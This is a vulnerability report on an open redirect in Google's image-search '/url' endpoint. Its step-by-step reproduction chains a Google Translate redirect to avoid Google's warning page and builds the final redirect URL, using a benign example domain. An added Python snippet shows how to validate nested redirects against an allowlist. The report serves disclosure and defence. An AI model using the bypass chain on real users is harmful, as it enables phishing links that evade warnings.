When a user searches for an image, Google generates a link like the following:
https://www.google.com/url?sa=i&url=https%3A%2F%2Felpais.com%2Felpais%2F2017%2F02%2F13%2Fciencia%2F1486986287_013868.html&psig=AOvVaw32qmRyOt4_pkNDMqoVlPeb&ust=1583227169251000&source=images&cd=vfe&ved=0CAIQjRxqFwoTCOjR6_m6--cCFQAAAAAdAAAAABAE
The "url" parameter is not properly validated, so an open redirect can be exploited through this parameter.
Only this parameter is mandatory; the other parameters can be dropped from the GET request without affecting the result:
https://www.google.com/url?&url=
How to reproduce the vulnerability:
1. Select the malicious URL
For example:
https://www.isecauditors.com
2. Wrap it in a Google Translate redirection, which avoids the Google alert message
https://translate.google.com/translate?sl=auto&tl=en&u=
For example:
https://translate.google.com/translate?sl=auto&tl=en&u=www.isecauditors.com
3. URL-encode the redirection
For that, we can use a service such as "https://meyerweb.com/eric/tools/dencoder/".
For example:
https%3A%2F%2Ftranslate.google.com%2Ftranslate%3Fsl%3Dauto%26tl%3Den%26u%3Dwww.isecauditors.com
4. Build the final URL, which redirects without the Google alert
https://www.google.com/url?sa=i&url=https%3A%2F%2Ftranslate.google.com%2Ftranslate%3Fsl%3Dauto%26tl%3Den%26u%3Dwww.isecauditors.com
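To show how a redirect endpoint's validation should treat this chain, here is an added example (my own code, not Google's and not part of the original report): it unwraps the nested redirectors used in the steps above and checks the host the user finally reaches against an allowlist, so the translate.google.com wrapper no longer hides the external destination from a check that only inspects the first hop. The redirector table and the allowlist are assumptions made for the demonstration.

```python
from urllib.parse import urlparse, parse_qs

# Redirector endpoints to unwrap, mapped to the query parameter that carries
# the destination. Assumed table for this demonstration, not Google's code.
REDIRECTORS = {
    ("www.google.com", "/url"): "url",
    ("translate.google.com", "/translate"): "u",
}

def normalize(target):
    """Parse a target; a bare host like 'www.isecauditors.com' is treated as https."""
    parsed = urlparse(target)
    if not parsed.scheme and not parsed.netloc:
        parsed = urlparse("https://" + target)
    return parsed

def first_hop_host(url):
    """Naive check: the host named directly in the 'url' parameter."""
    values = parse_qs(urlparse(url).query).get("url")
    return normalize(values[0]).netloc.lower() if values else None

def final_destination(url, max_hops=5):
    """Follow nested redirectors and return (final_host, hosts_passed_through).
    final_host is None for non-http(s) targets, a missing parameter or too many hops."""
    hops = []
    parsed = normalize(url)
    for _ in range(max_hops):
        if parsed.scheme not in ("http", "https"):
            return None, hops
        host = parsed.netloc.lower()
        param = REDIRECTORS.get((host, parsed.path))
        if param is None:
            return host, hops  # not a redirector: this is where the user lands
        hops.append(host)
        values = parse_qs(parsed.query).get(param)  # parse_qs percent-decodes once per hop
        if not values:
            return None, hops
        parsed = normalize(values[0])
    return None, hops

def is_safe_redirect(url, allowed_hosts):
    """Allow the redirect only if the host the user finally reaches is on the allowlist."""
    host, _ = final_destination(url)
    return host is not None and host in allowed_hosts

# Constructed from the chain in the report: the wrapper hides the external host from a first-hop check.
CHAINED = ("https://www.google.com/url?sa=i&url=https%3A%2F%2Ftranslate.google.com"
           "%2Ftranslate%3Fsl%3Dauto%26tl%3Den%26u%3Dwww.isecauditors.com")
ALLOWED = {"www.google.com", "translate.google.com"}  # assumed allowlist

if __name__ == "__main__":
    print("first hop:", first_hop_host(CHAINED))        # translate.google.com (looks internal)
    print("final:", final_destination(CHAINED))         # ('www.isecauditors.com', [...])
    print("safe:", is_safe_redirect(CHAINED, ALLOWED))  # False
```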